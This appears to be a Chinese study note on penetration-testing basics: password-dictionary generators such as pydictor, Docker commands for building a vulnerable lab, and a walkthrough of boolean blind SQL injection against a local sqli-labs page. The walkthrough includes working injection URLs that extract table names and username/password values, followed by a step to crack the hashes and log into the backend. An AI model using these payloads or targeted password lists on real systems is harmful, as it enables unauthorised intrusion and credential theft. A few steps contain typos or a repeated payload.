2019-9-9：渗透测试，基础学习，pydictor使用，sql盲注，docker使用，笔记

pydictor,强大的密码生成工具，可以合并密码字典，词频统计，去重，枚举数字字典
生成字典
python3 pydictor.py -base d --len 4 4 生成纯数字4位密码
python3 pydictor.py -base L --len 1 4 -o name.txt 生成1-4位纯字母字典，长度为1-4位，输出名字文件为 name.txt
python3 pydictor.py -extend F:\工具\pydictor\ex.txt --level 3 --len 3 10 -o sym.txt 根据提前给出的关于要作的攻击对象的信息文件，level过滤结果的级别为3，生成长度为3-10位的字典，文件名为sym.txt,密码内容是弱口令+用户信息+过滤机制
python3 pydictor.py -extend F:\工具\pydictor\ex.txt 3 --len 3 10 --encode sha1 -o mima.txt ，生成sha1加密的字典，--encode 生成加密字典
python3 pydictor.py --sedb 接下来输入收集的信息，最后可以设置输出路径，再运行生成社工字典，设置收集的信息使用 set enname test，ouput路径，设置输出路径，run运行

cupper，针对国人的社工密码生成器
cupper -i 交互式输入收集的信息生成字典

wordhound 基于推特搜索，pdf文档，reddit子网创建字典

brutescrape，基于网站爬取的密码生成，编辑sites.scrape文件，添加要生成密码的网站连接，运行python brutescrape.py即可

docker入门及漏洞环境搭建
开源的应用程序容器引擎，使用go语言开发，借助于docker打包的应用程序，将这些应用程序包含在容器下，在容器中实现虚拟化，容器使用的是沙箱机制，沙箱之间相互独立，占用资源非常少

docker的三个概念
镜像：image，docker镜像，是一个只读模版，镜像可以创建容器，比如在镜像中包含完整的操作系统，在该操作系统中，可以安装lamp环境，镜像可以创建容器
容器：container，docker利用容器来运行应用程序，容器是从镜像中创建运行的实例，容器可以运行，关闭，删除
仓库：repository,集中放镜像的地方，每个仓库可包含了多个镜像，可以私有可以公开，最大的仓库是dockerhub（hub.docker.com）
1,更新源，apt-get install docker.io
2,替换加速器，vim /etc/docker/daemon.json
{
"registry-mirrors": [
"https://dockerhub.azk8s.cn",
"https://reg-mirror.qiniu.com"
]
}
docker info 查看配置

docker镜像操作命令
docker serrch mysql，搜索mysql镜像
docker pull 镜像名称，下载镜像
docker images 查看本地下载好的镜像
docker rmi 镜像id，删除镜像

docker容器操作命令
docker run -d -p 8080:80 --rm --name 容器名 镜像id
run 运行
-d 表示后台运行
-p 1端口：2端口，将容器内部服务2端口，映射到本地1端口，如果-p后不手动设置端口，会随机分配端口
rm 当容器停止会自动删除
--name 容器运行成功之后，容器名称
镜像id或镜像名
docker ps 查看当前运行的容器
docker ps -a查看所有运行的容器的状态
docker stop 容器名或容器Id,停止容器
docker start 容器id，打开容器，如果运行容器时候加--rm就会在关闭的时候自动删除
docker rm 容器名称或容器id，删除容器
docker exec -it 容器名或容器id /bin/bash 进入容器内部，-it表示交互模式 ，输入exit退出容器

导入导出镜像
docker save 镜像id > 名字.tar ，导出镜像
docker load < 容器名字.tar ，导入镜像

sql注入盲注
用户提交的数据在后台数据库执行之后，没有返回任何数据到前端，无法在前端显示，需要使用盲注

基于布尔型盲注
1，探测输入点，'/1' and 1=1%23 /1' and '1'='1
注意，用户提交的数据被带入到数据库中执行，根据页面显示效果判断此处是否有注入点
2，收集数据库信息，当前用户名，当前数据库，数据库版本，所有数据库，等
http://127.0.0.1/sqli/Less-8/index.php?id=1' and length(user())=14%23
可以使用bp抓包，猜测出当前用户名长度，数据库长度等
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr(user(),1,1))=1%23
判断用户名首字母首字符
127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr(user(),2,2))=114%23，后续依次判断，可以使用BP，看到pyload2位置的数字，转码之后得到当前用户是root@localhost
3，判断当前数据库
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr(user(),2,2))=114%23，bp爆破之后，看pyload2位置数字，转码之后得到数据库为secutity数据库
查询当前数据库的表
先计算某个表的名字长度
再判断表中的每个字符
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit 0,1),1,1))=101%23，bp爆破，判断出security中表有emails,users,等
4，获取制定表的字段名
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit 0,1),1,1))=101%23，bp爆破得出字段名首字母是i
最后依次判断第一个字段名，第二个字段名
最后找出敏感的字段，比如 username password
5，获取指定字段的值
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr((select group_concat(username,0x7e,password) from users limit 0,1),1,1))=105%23
6,解密密文数据，登录后台